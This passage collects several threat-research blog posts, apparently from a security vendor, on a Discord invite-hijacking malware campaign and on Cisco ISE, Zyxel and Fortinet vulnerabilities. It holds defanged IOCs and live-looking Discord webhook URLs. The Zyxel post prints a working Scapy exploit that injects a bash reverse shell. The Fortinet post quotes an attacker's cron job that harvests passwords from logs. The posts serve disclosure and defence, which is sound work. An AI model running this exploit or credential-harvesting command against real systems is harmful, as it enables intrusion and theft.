sensitive information, even within seemingly trustworthy online communities. Discord server owners and administrators Avoid temporary invite links - Use permanent invite links where possible and limit who can generate them. Temporary or limited-use links are more vulnerable to hijacking if they expire and the associated server name remains cached or referenced publicly. Audit and remove unused invites - Regularly review active, expired, or unused invite links via your server settings. Delete any links that are no longer in use to minimize the attack surface. Implement moderation bots - Use trusted moderation bots to monitor new joins, detect suspicious patterns and take automatic actions like flagging or banning suspicious users. Review server permissions regularly - Audit who has admin or elevated permissions. Pay special attention to roles that can manage webhooks or external integrations, as these are commonly abused in malware distribution campaigns. Educate your community - Create a pinned message or a dedicated #security channel to regularly share updates on scams, phishing tactics, or impersonation attempts. Educated users are your first line of defense. TTPs & IOCs The following list of Indicators of Compromise (IOCs) was extracted from the in-depth technical analysis conducted by Check Point Research, as detailed in their 2025 publication titled “From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery” (CheckPoint, 2025). This report outlines how threat actors leverage expired or hijacked Discord invite links to initiate complex infection chains involving malware such as AsyncRAT, Skuld Stealer, and ChromeKatz. The IOCs below reflect the domains, URLs, IPs, and payload sources identified throughout the campaign. Phishing Website captchaguard[.]me hxxps[:]//captchaguard[.]me/?key= PowerShell Script hxxps[:]//pastebin[.]com/raw/zW0L2z2M Bitbucket Repositories hxxps[:]//bitbucket[.]org/updatevak/upd/downloads hxxps[:]//bitbucket[.]org/syscontrol6/syscontrol/downloads hxxps[:]//bitbucket[.]org/updateservicesvar/serv/downloads hxxps[:]//bitbucket[.]org/registryclean1/fefsed/downloads hxxps[:]//bitbucket[.]org/htfhtthft/simshelper/downloads First Stage Downloader (GitHub) hxxps[:]//github[.]com/frfs1/update/raw/refs/heads/main/installer.exe hxxps[:]//github[.]com/shisuh/update/raw/refs/heads/main/installer.exe hxxps[:]//github[.]com/gkwdw/wffaw/raw/refs/heads/main/installer.exe Second Stage Downloader (Bitbucket) hxxps[:]//bitbucket[.]org/updatevak/upd/downloads/Rnr.exe hxxps[:]//bitbucket[.]org/syscontrol6/syscontrol/downloads/Rnr.exe Skuld Stealer Payload hxxps[:]//bitbucket[.]org/updatevak/upd/downloads/skul.exe hxxps[:]//bitbucket[.]org/syscontrol6/syscontrol/downloads/skul.exe AsyncRAT Payload hxxps[:]//bitbucket[.]org/updatevak/upd/downloads/AClient.exe hxxps[:]//bitbucket[.]org/syscontrol6/syscontrol/downloads/AClient.exe AsyncRAT Dead Drop Resolvers (Pastebin) hxxps[:]//pastebin[.]com/raw/ftknPNF7 hxxps[:]//pastebin[.]com/raw/NYpQCL7y hxxps[:]//pastebin[.]com/raw/QdseGsQL AsyncRAT C2 Infrastructure 101[.]99[.]76[.]120 87[.]120[.]127[.]37 185[.]234[.]247[.]8 microads[.]top Discord Webhooks Used by Skuld hxxps[:]//discord[.]com/api/webhooks/1355186248578502736/_RDywh_K6GQKXiM5T05ueXSSjYopg9nY6XFJo1o5Jnz6v9sih59A8p-6HkndI_nOTicO hxxps[:]//discord[.]com/api/webhooks/1348629600560742462/RJgSAE7cYY-1eKMkl5EI-qZMuHaujnRBMVU_8zcIaMKyQi4mCVjc9R0zhDQ7wmPoD7Xp Centripetal’s Perspective Centripetal’s contribution to the broader analysis of this campaign places special emphasis on the phishing domain captchaguard[.]me, which was used to lure victims into interacting with a ClickFix-style social engineering prompt. Our focus is to dive deeper into this specific domain to uncover additional behavioral indicators and techniques not covered in other public reports, particularly those related to user deception and social engineering. While Check Point has published an extensive technical breakdown of the malware’s delivery mechanisms and infection stages (CheckPoint, 2025), our analysis aims to complement their findings by shifting attention to the psychological and interaction-based tactics employed in the initial stages of the attack. Using open-source intelligence (OSINT), we gathered the following insights regarding the domain of interest: Figure 3. Domain Age Figure 4. Domain Registration Figure 5. Reputable name utilized in malicious domains Figure 6 - Security Vendor’s Analysis ( Sourced from Virus Total) At Centripetal, we apply a rigorous vetting process when identifying and analyzing potential phishing domains. Key indicators we prioritize include: Domain age Phishing domains are typically short-lived and newly registered, designed to operate briefly before being flagged and taken down. As shown in Figure 3, this domain is only 4 months old, a common trait among phishing infrastructure. Registration privacy While domain privacy is not inherently malicious, it is frequently used in phishing campaigns to obscure registrant identity. As seen in Figure 4, the registrant's information has been redacted for privacy, which raises a red flag. Domain name Threat actors often register domains that mimic or slightly alter legitimate brand names to mislead users. Figure 5 highlights how reputable names are frequently repurposed or altered to create convincing phishing lures. Uncommon TLDs According to a Unit 42 report (Unit 42, 2025), cybercriminals often favor uncommon top-level domains (TLDs) such as .me, due to lower registration costs, wider availability, and lax oversight. This tactic helps reduce detection by standard filters. Security Vendor Detection As illustrated in Figure 6, numerous security vendors have flagged the domain as malicious, with multiple engines specifically categorizing it as phishing-related. Next, we examine behavioral indicators commonly associated with phishing domains. According to sandbox analysis conducted by AnyRun (AnyRun, 2025), several red flags were observed for the domain in question. The sandbox trace reveals strong indicators of a fileless PowerShell-driven malware infection chain, employing techniques such as obfuscation, remote command execution, and in-memory C# compilation. This behavior aligns with threats like Lumma Stealer, ClickFix, and other custom .NET-based loaders frequently observed in fake CAPTCHA or drive-by download campaigns, corroborating findings previously reported by Check Point. (Figure 7) Figure 7. Suspicious activity observed in a sandbox environment. ( Sourced from AnyRun) Figure 8. ClickFix categorization ( Sourced from AnyRun) The final verdict from AnyRun (AnyRun, 2025) classifies the domain as malicious under the Pastebin/ClickFix category, confirming the use of deceptive CAPTCHA interstitials designed to socially engineer user interaction and deliver PowerShell payloads (e.g., XPowershell) or malware. (Figure 8) Additionally, reviewing historical images of the domain confirms the presence of a phishing lure crafted to mimic a Discord-like landing page, designed to deceive victims into engaging with the attack (Figure 9). According to CheckPoint “Clicking Verify executes JavaScript that silently copies a malicious PowerShell command to the user’s clipboard.” An analysis of Centripetal’s visibility into the campaign, focusing on the domain captchaguard[.]me, reveals that it was first recorded in our threat intelligence database five days after its initial registration. (Figure 10: Centripetal’s first observed timestamp on the left; Domain Tools WHOIS record on the right.) This delay suggests a possible detection gap, potentially caused by evasion tactics used by the threat actors to avoid early identification and automated scanning. Figure 10. Side by Side comparison with Centripetal’s threat intelligence and Domain Tools based on registration date. At the time of this writing, our coverage for this domain remains at 100%, meaning all observed resolution or connection attempts to captchaguard[.]me from our customers’ environments are actively shielded by our CleanINTERNET® and CleanINTERNET® DNS services. This ensures that any potential exposure to the associated threat infrastructure is blocked in real time, with no known instances of successful access or payload delivery (Figure 11). Figure 11. CTI BDN Coverage Although this analysis focused on a single domain observed in the campaign, blocking access to it significantly disrupts the attack chain. In this case, captchaguard[.]me served as a key redirection point for delivering the ClickFix lure. Preventing access to the domain stops the redirection flow and blocks malware execution before it begins, effectively neutralizing the threat at an early stage. This campaign highlights how threat actors continue to exploit trusted platforms such as Discord to launch highly targeted, multi stage malware attacks. By abusing expired or spoofed invite links and deploying social engineering tactics like ClickFix lures, attackers are able to bypass traditional defenses and compromise end users with tools like AsyncRAT, Skuld Stealer, and ChromeKatz. While the campaign’s infrastructure may seem fragmented, as demonstrated with captchaguard[.]me, blocking even a single critical domain can effectively disrupt the attack chain. Continuous monitoring, early detection, and proactive user education remain essential to minimizing the impact of evolving social engineering threats within widely used platforms. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets Hackers Abuse Discord Invite to Spread Malicious Links and Deliver AsyncRAT From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery Hackers Compromise Discord Invite to Inject Malicious Links Delivering AsyncRAT The Silent Redirect: A Deep Dive into Discord Invite Hijacking and Advanced Malware Discord flaw lets hackers reuse expired invites in malware campaign Are You at Risk from Discord Invite Link Flaws? Here’s What You Need to Know Security Bulletin: ClickFix and the New Era of Social Engineering A Peek into Top-Level Domains and Cybercrime Trigger Domain Analysis Sandbox analysis of trigger domain --- ### [Critical Unauthenticated RCE Vulnerabilities in Cisco ISE and ISE-PIC](https://www.centripetal.ai/threat-research/critical-unauthenticated-rce-vulnerabilities-in-cisco-ise-and-ise-pic) Published: 2025-07-16 Summary: Two critical Cisco ISE vulnerabilities (CVE-2025-20281 and CVE-2025-20282) allow unauthenticated remote code execution with root access. With a CVSS 10.0 score and simple exploitation paths, urgent… On June 25, 2025, Cisco disclosed two critical vulnerabilities affecting Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC). Tracked as CVE-2025-20281 and CVE-2025-20282, these flaws enable unauthenticated remote attackers to execute arbitrary commands as the root user via exposed HTTPS APIs. CVE-2025-20281 arises from insufficient validation of user-supplied input in a public API, allowing crafted requests to trigger remote code execution. CVE-2025-20282 results from inadequate file validation in an internal API, enabling attackers to upload and execute malicious files within privileged directories. While Cisco has stated that no in-the-wild exploitation has been confirmed to date, the vulnerabilities are simple to exploit and pose a severe risk to organizations using Cisco ISE and ISE-PIC in enterprise and government environments (Cisco, 2025; The Hacker News, 2025). Vulnerability Type (CWE) CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') CVSS Score Base Score: 10.0 (Critical) Attack Vector: Network (remote exploitation over HTTPS APIs) Attack Complexity: Low Privileges Required: None User Interaction: None Scope: Changed (compromise impacts underlying OS) Impact on CIA: Confidentiality: High Integrity: High Availability: High (Cisco, 2025) Impacted Versions and Mitigation Affected Cisco ISE/ISE-PIC VersionVulnerable ToRequired Action3.4CVE-2025-20281CVE-2025-20282Upgrade to Patch 23.3CVE-2025-20281Upgrade to Patch 6 Please note: 3.2 and earlier releases of Cisco ISE or ISE-PIC are not vulnerable to CVE-2025-20281 or CVE-2025-20282. (SOCRadar, 2025; Cisco, 2025; Arctic Wolf, 2025; Cisco, 2025) Exploit Process CVE-2025-20281: API Request RCE Initial Request: Attacker crafts an HTTP(S) request targeting the vulnerable public API Payload Delivery: Malicious payload is embedded in the request body, exploiting input validation flaws. Command Execution: The input is executed on the underlying OS as root, enabling: Full system compromise Credential theft Persistence CVE-2025-20282: Arbitrary File Upload and Execution Initial Upload: Attacker sends a specially crafted file to the internal API endpoint. Privilege Escalation: The upload bypasses directory protections and lands in privileged directories. Execution: The attacker triggers execution of the uploaded file, gaining root access. (BleepingComputer, 2025; SOCRadar, 2025) Timeline June 2025: Vulnerabilities privately reported by Trend Micro Zero Day Initiative and GMO Cybersecurity. June 25, 2025: Cisco advisory and patches released. June 26, 2025: Public disclosure via multiple security vendors. As of June 27, 2025: No known in-the-wild exploitation. (The Hacker News, 2025; Cisco, 2025) TTPs & IOCs Tactics, Techniques, and Procedures: T1190 – Exploit Public-Facing Application T1078 – Valid Accounts (Post-Exploitation Persistence) T1105 – Ingress Tool Transfer Indicators of Compromise: Unusual API requests: POST /api/v1/… with large payloads File uploads to internal endpoints Suspicious processes: Unexpected binaries or scripts in system directories Shell spawns initiated by the ise process Network indicators: Connections from untrusted or foreign IP addresses to management interfaces (Cisco, 2025) Centripetal’s Perspective The disclosure of CVE-2025-20281 and CVE-2025-20282 underscores the persistent risk posed by unauthenticated API exposures in critical infrastructure platforms. Although no widespread exploitation has been confirmed, the combination of simple exploitation, unauthenticated access, and root-level compromise makes these vulnerabilities particularly severe for enterprise and government environments relying on Cisco ISE as a central trust anchor. While Centripetal telemetry has not yet identified confirmed threat activity associated with these specific CVEs, historical patterns consistently show that critical Cisco vulnerabilities are rapidly incorporated into Centripetal's Threat Intelligence. Organizations should assume that proof-of-concept exploits will emerge shortly, and proactively: Audit their external attack surface to identify any exposed ISE management interfaces. Enforce strict segmentation of administrative APIs from untrusted networks. Continuously monitor for anomalous API requests and file upload attempts. Accelerate patch deployment across all impacted environments. This incident highlights the strategic importance of layered defenses, including continuous intelligence, strong segmentation, and policy-driven enforcement, to limit the blast radius of high-impact vulnerabilities in network security infrastructure. If you are a current client of Cisco please contact support@centripetal.ai. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative. Resources Cisco Identity Services Engine Unauthenticated Remote Code Execution Vulnerabilities Critical RCE Flaws in Cisco ISE and ISE-PIC Allow Unauthenticated Attackers to Gain Root Access Critical Cisco ISE Vulnerabilities Allow Root-Level RCE Cisco warns of max severity RCE flaws in Identity Services Engine --- ### [Critical Remote Command Injection in Zyxel Firewalls](https://www.centripetal.ai/threat-research/critical-remote-command-injection-in-zyxel-firewalls) Published: 2025-07-09 Summary: CVE-2023-28771 is a critical remote command injection vulnerability in multiple Zyxel firewall models that allows unauthenticated attackers to execute arbitrary commands via specially crafted IKEv2… CVE-2023-28771 is a critical remote command injection vulnerability found in multiple Zyxel firewall models. It allows unauthenticated attackers to execute arbitrary commands by sending specially crafted packets to the device's WAN interface via the Internet Key Exchange (IKE) protocol (UDP/500). This vulnerability stems from improper validation of incoming IKEv2 messages, which enables attackers to manipulate input data and trigger OS-level command execution with root privileges.The flaw affects Zyxel USG, ATP, VPN, and ZyWALL series firewalls. It has seen active exploitation in the wild, including widespread attacks by botnets such as Mirai, aiming to co-opt vulnerable devices into distributed denial-of-service (DDoS) networks. Due to the unauthenticated nature of the exploit and its ease of execution, CVE-2023-28771 has a CVSS score of 9.8 (Critical).Zyxel released patches in April 2023, but many organizations had not yet applied the updates, leading to a rapid uptick in exploitation. Attackers typically scan the internet for exposed WAN interfaces, then deliver payloads to vulnerable targets to gain remote access or join devices into botnets (SecurityWeek, 2025).Vulnerability Type (CWE)CWE-78: Improper Neutralization of Special Elements used in a OS Command ('OS Command Injection')This vulnerability results from the device failing to properly sanitize input received via IKEv2 negotiation packets, allowing injected OS commands to be executed on the target firewall.CVSS ScoreBase Score: 9.8 (Critical)Attack Vector: Network (AV:N)Attack Complexity: Low (AC:L)Privileges Required: None (PR:N)User Interaction: None (UI:N)Scope: Unchanged (S:U)Impact on CIA: HighConfidentiality: High (SC:H)Integrity: High (SI:H)Availability: High (SA:H)Impacted VersionsModelAffected VersionsPatched VersionsATP SeriesV4.60 to V5.35V5.36USG FLEX SeriesV4.60 to V5.35V5.36VPN SeriesV4.60 to V5.35V5.36ZyWALL/USG Series (End-of-Life)V4.60 to V4.73V4.73 Patch 1Mitigation StepsUpgrade Firmware Immediately: Apply Zyxel's patch V5.36 for supported models. End-of-life products should be replaced.Restrict UDP Port 500 (IKE): Use firewall rules to block or rate-limit IKE traffic (UDP/500) from untrusted sources.Monitor for Anomalies: Check system logs for unusual IKEv2 negotiation attempts or command execution activity.Audit /tmp/sdwan_vpndebug.log for suspicious Notify payload indicators.Replace EOL Devices: End-of-life Zyxel models should be decommissioned as they will not receive patches.Exploit Process (According to Rapid7 Analysis)1. Target DiscoveryAttackers scan for Zyxel devices exposing UDP port 500 (IKEv2) on their WAN interfaces.Confirm usage of Zyxel’s sshipsecpm process via netstat:netstat -lnp | grep ':500' # Shows sshipsecpm bound to UDP port 500 sudo ike-scan -M <Target IP> # Confirms the WAN interface on the device is both receiving IKE messages and transmitting a responseDevices are vulnerable in default configurations, even if VPN isn’t set up, and run sshipsecpm listening on port 500.2. Threat Actors (TA) Craft IKEv2 Notify PacketA customized IKEv2 Notify message is sent, using:Type 14 (NO_PROPOSAL_CHOSEN)A payload composed of:First 48 bytes that conform to DES‑CBC expectationsFollowed by attacker-controlled shell commands embedded directly after that3. TA Trigger Vulnerable Logging PathThe device processes the IKEv2 packet:Detects Notify type 14 and enters ikev2_decode_notify().Copies the payload, decrypts the first 48 bytes, but leaves attacker commands intact in memory.A vulnerable logging function then builds a system shell command and entire string is logged to /tmp/sdwan_vpndebug.log:system("echo \\"...decoded + injected data...\\" >> /tmp/sdwan_vpndebug.log");Because the injected data is appended to the command as raw text, this causes root-level command execution.4. Execute Payload as RootThe following open-source Scapy script in Python will trigger the vulnerability and achieve a reverse root shell.#!/usr/bin/python3 import sys from scapy.all import * load_contrib('ikev2') cmd = "\\";bash -c \\"exec bash -i &>/dev/tcp/" + sys.argv[2] + "/" + sys.argv[3] + " <&1;\\";echo -n \\"" packet = IP(dst = sys.argv[1]) / UDP(dport = 500) / IKEv2(init_SPI = RandString(8), next_payload = 'Notify', exch_type = 'IKE_SA_INIT', flags='Initiator') / IKEv2_payload_Notify(next_payload = 'Nonce', type = 14, load = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB" + cmd) / IKEv2_payload_Nonce(next_payload = 'None', load = RandString(68)) send(packet) When run, attacker sees a root shell:uid=0(root) Linux usgflex100 ... mips64 ... 5. Post‑exploitation UsesFull root control allows installing malware, recruiting the device for botnets (e.g., Mirai-like attacks), or setting persistence and moving laterally.TimelineApril 13, 2023: Zyxel releases security advisory and firmware patches for CVE-2023-28771.May 2023: Rapid7 and other researchers observe mass exploitation in the wild, primarily by Mirai-linked botnets.November 2023:  ****Report from non-profit cybersecurity center for critical sectors SektorCERT revealed that 11 Danish energy organizations were compromised in May 2023 through the exploitation of CVE-2023-28771.June 16, 2025:  ****GreyNoise observed a concentrated burst of exploit attempts targeting CVE-2023-28771.IOCsExploitation IPs:246 malicious IPs were observed by GreyNoise (GreyNoise, 2025) launching exploit attempts in the past month.Traffic CharacteristicsUDP/500 (IKE) traffic targeting Zyxel devices.UDP spoofing suspected.Payload PatternsIKEv2 Notify packets with type=14, containing DES‑CBC decrypted content and appended shell commands.Notification Data layout: first 48 bytes decrypted, followed by attacker-injected command sequence.Log ArtifactsEntries in /tmp/sdwan_vpndebug.log such as:[MM/DD HH:MM:SS] vpn_info: [cgnat] 4th cgnat convert wrongCentripetal’s PerspectiveCentripetal is actively monitoring exploitation activity related to CVE-2023-28771, a critical remote command injection vulnerability affecting several Zyxel firewall and VPN models. This flaw allows unauthenticated attackers to execute arbitrary commands by sending specially crafted IKEv2 packets to UDP port 500, putting perimeter infrastructure at significant risk.Since its public disclosure, we’ve observed a sharp rise in scanning and exploitation attempts. Unlike more complex vulnerabilities that depend on specific configurations, CVE-2023-28771 affects devices in default deployments, making it highly accessible to botnets and other opportunistic threat actors.To asses Centripetal’s coverage, we extracted a list of 247 unique IPs reported by Grey Noise that cover the last 10 days. An internal analysis against out threat intelligence data revealed the following:Overall coverage over the past 30 days indicates a visibility rate of approximately 13.4% (Figure 1).Figure 1. CTI IP CoverageA total of 33 IP addresses within our visibility scope have been associated with reconnaissance activity (Figure 2). Threat intelligence providers typically classify such behavior based on traffic captured by globally distributed honeypots and sensor networks. For an IP address to be attributed to CVE-2023-28771 reconnaissance, the traffic must demonstrate specific indicators, such as malformed IKEv2 packets sent over UDP port 500, consistent with exploit patterns targeting vulnerable Zyxel firewalls.Figure 2. IOCs Associated with a TacticIt is important to emphasize that not all UDP 500 scan activity is automatically tagged with a CVE-2023-28771 label. In this case, a significant portion of the IP addresses observed conducting reconnaissance and suspected exploitation attempts are allocated to Verizon Business. Given the widespread use of Verizon's infrastructure including dynamic residential pools, enterprise connections, and proxy services, these IPs undergo careful behavioral evaluation to reduce false positives. Misclassification could result in unintended blocking of legitimate traffic, particularly from high reputation enterprise sources. (Figure 3)The remaining 214 IP addresses identified during our internal analysis did not meet the threshold for inclusion in actively deployed CTI due to insufficient behavioral indicators. As noted by GreyNoise (GreyNoise, 2025), this is partly attributed to the spoofable nature of UDP traffic, which makes it difficult to verify the authenticity of the source IP address without corroborating evidence.This limitation underscores a key challenge faced by threat intelligence vendors: balancing attribution accuracy with operational impact. Threat actors exploit this ambiguity by leveraging reputable IP space to bypass detection and blend into benign traffic, a tactic frequently observed in opportunistic scanning, botnet propagation, and DDoS staging campaigns.Figure 3. Legitimate Verizon Business IP tagged as SpoofableAccording to GreyNoise (GreyNoise, 2025), a notable wave of CVE-2023-28771 reconnaissance occurred on June 16, 2025 (Figure 4) , involving 244 unique Verizon IPs in a highly coordinated and short-lived scanning campaign. These IPs exhibited no prior or subsequent activity, suggesting use by automated infrastructure such as Mirai derived botnets rather than persistent actors. (Figure 5)Figure 4. First Observed date by GreyNoise  Figure 5. First Reported for Abuse date by AIPDBAs with most threat actor campaigns, our main goal is to integrate and deploy actionable threat intelligence data as quickly as possible. Analyzing the 33 IP addresses in Centripetal’s threat intelligence confirms alignment with entries found across several major threat intelligence databases. As observed in Figures 4 and 5, this analysis supports the successful aggregation and enrichment of data into customer facing threat feeds. Notably, the publication timeline of these IOCs (Figure 6) aligns closely with that of external threat intelligence sources, highlighting our ability to aggregate and deploy indicators in near real time. These indicators are now actively deployed within our real time defense solution. This approach ensures that emerging threats, such as reconnaissance tied to CVE-2023-28771, are rapidly addressed before they escalate into direct compromise or exploitation events.Figure 6. Centripetal’s IOCs published per dayGiven the potential impact on remote access and boundary security, Centripetal strongly recommends the following:• Identify any Zyxel firewall or VPN appliances in your environment• Apply vendor issued patches immediately to mitigate exposure• Monitor traffic to UDP port 500 for indicators of scanning or exploit attemptsCentripetal continues to shield customers from known malicious infrastructure associated with this campaign and is actively tracking emerging indicators. We remain committed to helping organizations reduce risk and maintain resilience against high impact threats.CVE-2023-28771 represents a high-severity threat to organizations running vulnerable Zyxel firewalls. Due to the trivial exploitability, absence of authentication requirements, and high impact across confidentiality, integrity, and availability, this vulnerability has been aggressively targeted by botnets and opportunistic attackers.Organizations using affected Zyxel models, particularly those exposing UDP/500 to the Internet, must prioritize patching to firmware version V5.36 or later. For devices beyond support, replacement is the only viable option. In addition, restricting IKE traffic, enforcing network segmentation, and monitoring logs for suspicious activity will help mitigate ongoing risks.If you are a current client of Zyxel please contact support@centripetal.ai.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.ResourcesSecurityWeek - Zyxel Firewall Vulnerability Again in Attacker CrosshairsNIST - CVE-2023-28771Zyxel - Zyxel security advisory for OS command injection vulnerability of firewallsGrey Noise - IOCs reported within the past 10 daysGreyNoise - GreyNoise Observes Exploit Attempts Targeting Zyxel CVE-2023-28771AttackerKB (A Rapid7 Project) - CVE-2023-28771 --- ### [Geopolitical Events and Security Awareness](https://www.centripetal.ai/threat-research/geopolitical-events-and-security-awareness) Published: 2025-06-26 Summary: Following U.S. military action in Iran, Centripetal is tracking a sharp rise in reconnaissance activity and potential cyber threats. Iranian threat actors are known for phishing and vishing… By Matthew SparrowOn Saturday, June 21st 2025, the United States conducted military operations against targets in Iran.  At any point when there is an escalation in geopolitical events, Centripetal analysts prepare for an increase in cyber threat activity as well.  Between the months of May and June, there has been a documented uptick of approximately 20 billion reconnaissance associated events at the time of this release, as well as sustained attacks at various organizations.Of note, Iranian threat actors have historically had significant success conducting social engineering campaigns, utilizing both phishing and vishing, against a broad range of targets. TTPs include targeting governments, critical infrastructure, logistics services, and service providers. This may involve attacking a partner organization prior to the final intended target.Finally, news of a “massive data breach” involving billions of records is being tracked and analyzed. At this time, it appears this is simply a consolidated list of data from multiple other breaches (or COMB, Combination of Many Breaches). While much of the data does not appear to be new, it offers attackers a central repository for querying target credentials.Mitigation StrategiesConduct security awareness training across all organization membersIdentify high-risk individuals, conduct tailored training, and ensure additional security measures are in place for protectionEnforce Multi-Factor Authentication wherever possibleEnsure software is patched to the most current version that still facilitates operationsCentripetal’s PerspectiveAs part of preparations, customers can expect for medium and low confidence feeds to be migrated into existing policies for monitoring in order to identify activity that may involve re-activation of previously defunct or emerging threat infrastructure. Analysts will coordinate with customers directly on recommendations for shielding over the coming weeks.Centripetal's team of analysts is actively monitoring this developing geopolitical situation and its potential cybersecurity implications. Our intelligence team remains vigilant in tracking any emerging threats associated with these events and is prepared to provide timely updates and additional mitigation recommendations as the situation evolves. Customers are encouraged to maintain open communication with us during this period of heightened alert.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.Resourceshttps://www.npr.org/2025/06/21/nx-s1-5441127/iran-us-strike-nuclear-trumphttps://www.bleepingcomputer.com/news/security/no-the-16-billion-credentials-leak-is-not-a-new-data-breach/ --- ### [Proof-of-Concept Exploit Observed for Critical Zero-Day](https://www.centripetal.ai/threat-research/proof-of-concept-exploit-observed-for-critical-zero-day) Published: 2025-06-17 Summary: CVE-2025-32756 is a critical Fortinet zero-day under active exploitation. It allows remote code execution, and affected systems should be patched immediately. CVE-2025-32756 is a critical remote code execution (RCE) vulnerability affecting multiple Fortinet products, including FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera. The flaw arises from a stack-based buffer overflow in the handling of the AuthHash cookie’s enc parameter within the /remote/hostcheck_validate HTTP endpoint. Due to insufficient input validation, unauthenticated attackers can send specially crafted requests that overwrite memory on the stack, leading to arbitrary code execution with system-level privileges. The vulnerability is remotely exploitable over the network and requires no user interaction or authentication, making it highly accessible to attackers. Public proof-of-concept (PoC) exploit code has been released, and Fortinet has confirmed in-the-wild exploitation against FortiVoice appliances. Affected systems are exposed to full compromise, with observed attack patterns including network scanning, credential harvesting via enabled fcgi debugging, and systematic erasure of system crash logs to evade detection. The issue impacts product versions released before May 2025 and has been assigned a CVSS score of 9.8 (Critical) due to its ease of exploitation and the severity of its impact on confidentiality, integrity, and availability. (Cyber Security News, Fortinet, 2025)Vulnerability Type (CWE)CWE-787: Out-of-Bounds Write (NIST)Occurs when a program writes data past the end or before the beginning of a buffer. This can corrupt data, crash the application, or allow attackers to execute arbitrary code by overwriting critical memory regions such as return addresses or function pointers.CWE-121: Stack-Based Buffer Overflow (Fortinet)Occurs when a program writes more data to a buffer located on the stack than the buffer can hold, which can overwrite adjacent memory, including the return address of a function.CVSS ScoreBase Score: 9.8 (Critical)Attack Vector: Network (AV:N)Attack Complexity: Low (AC:L)Privileges Required: None (PR:N)User Interaction: None (UI:N)Scope: Unchanged (S:U)Impact on CIA: HighConfidentiality: High (SC:H)Integrity: High (SI:H)Availability: High (SA:H)Impacted VersionsProduct versionVulnerableMitigationFortiCamera 2.12.1.0 through 2.1.3Upgrade to 2.1.4 or aboveFortiCamera 2.02.0 all versionsMigrate to a fixed releaseFortiCamera 1.11.1 all versionsMigrate to a fixed releaseFortiMail 7.67.6.0 through 7.6.2Upgrade to 7.6.3 or aboveFortiMail 7.47.4.0 through 7.4.4Upgrade to 7.4.5 or aboveFortiMail 7.27.2.0 through 7.2.7Upgrade to 7.2.8 or aboveFortiMail 7.07.0.0 through 7.0.8Upgrade to 7.0.9 or aboveFortiNDR 7.67.6.0Upgrade to 7.6.1 or aboveFortiNDR 7.47.4.0 through 7.4.7Upgrade to 7.4.8 or aboveFortiNDR 7.27.2.0 through 7.2.4Upgrade to 7.2.5 or aboveFortiNDR 7.17.1 all versionsMigrate to a fixed releaseFortiNDR 7.07.0.0 through 7.0.6Upgrade to 7.0.7 or aboveFortiNDR 1.51.5 all versionsMigrate to a fixed releaseFortiNDR 1.41.4 all versionsMigrate to a fixed releaseFortiNDR 1.31.3 all versionsMigrate to a fixed releaseFortiNDR 1.21.2 all versionsMigrate to a fixed releaseFortiNDR 1.11.1 all versionsMigrate to a fixed releaseFortiRecorder 7.27.2.0 through 7.2.3Upgrade to 7.2.4 or aboveFortiRecorder 7.07.0.0 through 7.0.5Upgrade to 7.0.6 or aboveFortiRecorder 6.46.4.0 through 6.4.5Upgrade to 6.4.6 or aboveFortiVoice 7.27.2.0Upgrade to 7.2.1 or aboveFortiVoice 7.07.0.0 through 7.0.6Upgrade to 7.0.7 or aboveFortiVoice 6.46.4.0 through 6.4.10Upgrade to 6.4.11 or aboveMitigation StepsUpdate to the latest patched versions immediately.Disable HTTP/HTTPS administrative interfaces on exposed devices.Disable SSL VPN if it is not actively used.Monitor logs for signs of suspicious command execution through the SSL VPN process.Apply zero trust access policies to restrict external access.Enable MFA ****across all administrative access.Deploy IPS/IDS rules to monitor abnormal POST /remote/hostcheck_validate traffic.Exploit ProcessThe exploitation process follows the following steps according to Fortinet’s PSIRT advisory (FG-IR-25-254).Phase 1: Target Discovery and ReconnaissanceThreat Actor (TA) scans network segments to identify vulnerable Fortinet devices (FortiVoice, FortiMail, FortiNDR, FortiRecorder, FortiCamera).Tools like nmap, masscan, or a custom Python scanner may be used to detect open ports and identify systems exposing the /remote/hostcheck_validate endpoint.Phase 2: Exploitation via Buffer OverflowTA uses a publicly available or custom script (e.g., fortinet_cve_2025_32756_poc.py) to initiate the exploit:python3 fortinet_cve_2025_32756_poc.py <target_ip> [-p <port>] [-d]The script sends a malformed HTTP POST request to:http://<target_ip>/remote/hostcheck_validateWithin this request, the AuthHash cookie contains a malicious enc parameter, which is carefully crafted to trigger a stack-based buffer overflow, allowing arbitrary code execution.Phase 3: Initial Payload ExecutionOn successful exploitation, the attacker achieves unauthenticated Remote Code Execution (RCE) on the device.Initial payload usually involves:Dropping malware files (e.g., /bin/wpad_ac_helper)Gaining a reverse shell or persistent access mechanismModifying system logs or disabling loggingPhase 4: Establish Persistence and Credential HarvestingTA enable fcgi debugging to extract sensitive data:diag debug application fcgiThe setting general to-file ENABLED is activated.This is non-default and serves as an Indicator of Compromise (IoC).Modify crontab entries to capture credentials:File: /data/etc/crontab or /var/spool/cron/crontabs/rootExample cron job added:0 */12 * * * root busybox grep -rn passw /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null > /var/spool/crashlog/fcgi.debugThis greps password strings from debug logs and saves to /var/spool/.sync.Deploy additional files for persistence and lateral movement:/lib/libfmlogin.so: Malicious SSH credential sniffer/tmp/.sshdpm : Captures stolen credentials/bin/busybox , /bin/fmtest : Utility and scanning tools/etc/httpd.conf : Modified to include SOCKS proxy module:LoadModule socks5_module modules/mod_socks5.soPhase 5: Lateral Movement and Network ReconnaissanceTA use 